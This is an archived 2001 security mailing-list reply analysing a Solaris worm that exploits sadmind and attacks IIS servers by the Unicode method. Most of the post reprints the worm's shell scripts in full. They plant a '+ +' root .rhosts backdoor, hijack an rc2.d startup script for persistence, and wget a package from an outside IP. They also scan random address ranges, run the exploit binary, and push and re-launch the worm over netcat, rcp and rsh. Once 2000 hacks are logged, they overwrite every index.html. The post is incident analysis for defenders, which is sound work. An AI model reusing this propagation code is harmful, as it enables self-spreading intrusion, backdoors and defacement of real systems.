Re: httpd and sunrpc probes from 'sunos 5.6' machines

From: Martin Markgraf (mm@RIEN-AG.DE)
Date: Tue May 08 2001 - 03:36:57 PDT
Next message: Frank Quinonez: "Re: 4 similar IIS attempts in a 48 hour period."
Previous message: Corch: "linux hack"
In reply to: Brad Doctor: "Re: httpd and sunrpc probes from 'sunos 5.6' machines"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello,

Brad Doctor wrote:

> I've also seen much of the same -- I submitted this to the list over the
> weekend, but it apparently never made it there.
>
> Basically, there is a worm process much like Lion, etc. that after compromising
> the machine, starts generating IP addresses and going after more.  The exploit
> that is being used is some sort of sadmin exploit.  A tell-tale sign is a
> root shell open on port 600 (not functional however).  The exploit places it's
> contents in /dev/cuc and goes to town with a perl script and a random number
> generator.  It also creates a wide-open .rhosts for root.  It also starts
> an inetd process with /tmp/.x that has one service, the root shell bound to
> it, just like the lion stuff did ala "sh -i", however this shell has no IO
> capabilities on Solaris, and is thus useless.  So, much like the other worms,
> this one trudges on blindly after cracking a machine that was wide-open to
> begin with.  I think the same group wrote this one as well due to it's
> similarities in execution and methodology.  It is executing Unicode attacks,
> with static HTML in the perl script, typical anti US stuff.

In the last five days or so I have seen about 9 scans for port 111 on a single
machine. Scanning back these hosts has shown that 8 of them are
running under solaris 5.6 and have an open port 600. The root shell on the
machines I have seen was functional if you connect to them with a program
like netcat instead of telnet since a simple "sh -i" does not set appropriate
environment.
The worm itself uses port 600 initial to create a "+ +" .rhosts file in
the root home directory of a new hacked box and than copy itself via
rcp as /tmp/uni.tar to these box.

There ist the filelist of the /tmp/uni.tar that I have found:

drwxr-xr-x 0/1               0 Apr 29 12:55 2001 /dev/cuc/
-rwxr-xr-x 0/1            6556 Apr 26 08:07 2001 /dev/cuc/brute
-rw-r--r-- 0/1              86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt
-rw-r--r-- 0/1             655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt
-rwxr-xr-x 0/1           11828 Apr 25 15:27 2001 /dev/cuc/grabbb
-rw-r--r-- 0/1             151 Apr 26 09:13 2001 /dev/cuc/ranip.pl
-rwxr-xr-x 0/1            1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh
-rwxr-xr-x 0/1           14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc
-rwxr-xr-x 0/1             217 Apr 26 09:59 2001 /dev/cuc/start.sh
-rwxr-xr-x 0/1             566 Apr 27 03:45 2001 /dev/cuc/time.sh
-rw-r--r-- 0/1           67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl
-rwxr-xr-x 0/1             645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh
-rwxr-xr-x 0/1           28620 Apr 26 08:30 2001 /dev/cuc/nc
-rw-r--r-- 0/1             413 Apr 26 11:16 2001 /dev/cuc/index.html
-rwxr-xr-x 0/1          136248 Apr 29 09:20 2001 /dev/cuc/wget

And these are the shell scripts:

cat cmd1.txt
------------
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
exit


cat cmd2.txt
------------
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit


cat start.sh
------------
#!/bin/sh
if [ ! -d /dev/cub ]; then
/bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
/bin/nohup /dev/cuc/sadmin.sh &
/bin/nohup /dev/cuc/uniattack.sh &
i=`/bin/echo "$i+1"|/bin/bc`
done

cat time.sh
-----------
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
/bin/sleep 300
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
/bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
process=`/bin/awk '{print $2}' /dev/cub/tmp2`
for p in $process;do
/bin/grep $p /dev/cub/tmp3
if [ $? = 0 ];then
/bin/kill -9 $p
fi
done
/bin/cp /dev/cub/tmp2 /dev/cub/tmp1
i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
if [ $i -gt 2000 ];then
/bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
/bin/rm -f /dev/cub/result.txt
fi
done

cat sadmin.sh
-------------
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
/bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
if [ $? = 0 ];then
/dev/cuc/brute 3 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
else
/dev/cuc/brute 4 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
fi
fi
fi
/bin/rm -f /dev/cub/$i.rpc.txt
done
/bin/rm -f /dev/cub/$i.txt
done

cat uniattack.sh
----------------
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
done
rm -f /dev/cub/$i.txt


regards,
  Martin

--
Martin Markgraf
Rien Informationssysteme AG                         fon: +49 2841 9083061
Eurotec-Ring 15                                     fax: +49 2841 9083069
D-47445 Moers            http://www.rien-ag.de          mm@rien-ag.de
Next message: Frank Quinonez: "Re: 4 similar IIS attempts in a 48 hour period."
Previous message: Corch: "linux hack"
In reply to: Brad Doctor: "Re: httpd and sunrpc probes from 'sunos 5.6' machines"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Thu May 10 2001 - 23:26:53 PDT